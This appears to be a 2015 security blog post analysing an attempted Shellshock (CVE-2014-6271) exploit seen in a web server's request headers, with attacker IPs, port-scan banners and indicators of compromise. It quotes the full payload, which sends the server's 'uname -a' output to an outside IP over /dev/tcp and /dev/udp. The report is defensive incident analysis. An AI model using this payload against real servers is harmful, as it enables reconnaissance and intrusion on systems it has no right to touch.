Analecta Cyber Company Blog: Possible Compromised Host Scanning for Shellshock

2015-03-23

Possible Compromised Host Scanning for Shellshock

Synopsis

At 2015-03-12T03:00:44 a scan originated from IP address 82.165.157.217 (1&1 Internet AG, associated with domain ONLINEHOME-SERVER.INFO) attempting to exploit the 2014 Shellshock vulnerabiliy (CVE-2014-6271). If successful, the payload commands would have created multiple reverse TCP and UDP connections to a second IP address in attempts to extract detailed information likely to be used for further compromise.


Exploit

The remote attacker attempted to access a Common Gateway Interface (CGI) script named "test-cgi" located within the default "cgi-bin" directory on the web server. GET /cgi-bin/test-cgi The Referrer string and the User Agent string supplied contains the exploit and the "payload" - in this case initial scouting code.

 () { :;}; 
/bin/bash -c \"
    echo DOMAIN-REDACTED.COM/cgi-bin/test-cgi > /dev/tcp/62.193.209.133/23; 
    /bin/uname -a > /dev/tcp/62.193.209.133/23; 
    echo DOMAIN-REDACTED.COM/cgi-bin/test-cgi > /dev/udp/62.193.209.133/80
\" 
Formatted for readability


Origin IP Address

82.165.157.217 
Registered by: 1&1 Internet AG 
Associated domain: ONLINEHOME-SERVER.INFO


Other IP Addresses

The "scouting" code as I've dubbed it here attempts to contact a second IP address: 
62.193.209.133 
Registered by: AMEN Networks, France (RIPE)
Associated domain: None. 

At the time of this report a proxied port scan was used to enumerate ports open on 62.193.209.133 and associated banners: 

FTP - 21 220 ProFTPD 1.3.2e Server (ProFTPD) [62.193.209.133] 

SMTP - 25 220 vds-818019.amen-pro.com ESMTP 

HTTP - 80 HTTP/1.1 200 OK Date: Mon, 23 Mar 2015 01:22:23 GMT Server: Apache/2.2.3 (CentOS) Last-Modified: Tue, 21 Jan 2014 08:24:28 GMT ETag: "103d80ca-1a4d-4f076bc9c2700" Accept-Ranges: bytes Content-Length: 6733 Connection: close Content-Type: text/html 

POP3 - 110 +OK Hello there. <36079 data-blogger-escaped-.1427073743="" data-blogger-escaped-localhost.localdomain=""> 

IMAP - 143 * OK [CAPABILITY IMAP4rev1 UIDPLUS CHILDREN NAMESPACE THREAD=ORDEREDSUBJECT THREAD=REFERENCES SORT QUOTA IDLE ACL ACL2=UNION STARTTLS] Courier-IMAP ready. Copyright 1998-2004 Double Precision, Inc. See COPYING for distribution information. * BYE Disconnected for inactivity


Indicators of Compromise

  • Connections to or from 82.165.157.217 or 62.193.209.133. 
  • Outbound TCP connections to 62.193.209.133 on port 23. 
  • Outbound UDP connections to 62.193.209.133 on port 80.


Damage Assessment

No damage was sustained by the server from these requests. If the attack had been successful the victim should expect secondary connections once it's established the server is vulnerable to the CVE-2014-6271 (Shellshock) vulnerability. The intruder would have the privileges of the running web server user. It's likely the attacker would create a secondary method of access and/or attempt to escalate to a more privileged user account. Because the attacker uses the uname tool to identify the specific kernel type and version we assess this is a slightly more sophisticated attack methodology than seen with other common "Shellshock" attacks.

Reference:
It is important to note that the registered owner of the IP addresses involved in this attack may be victims of a network incident. It is possible in many cases that the IP addresses identified from an incident are owned by one person or organization but are under the control of an unauthorized user.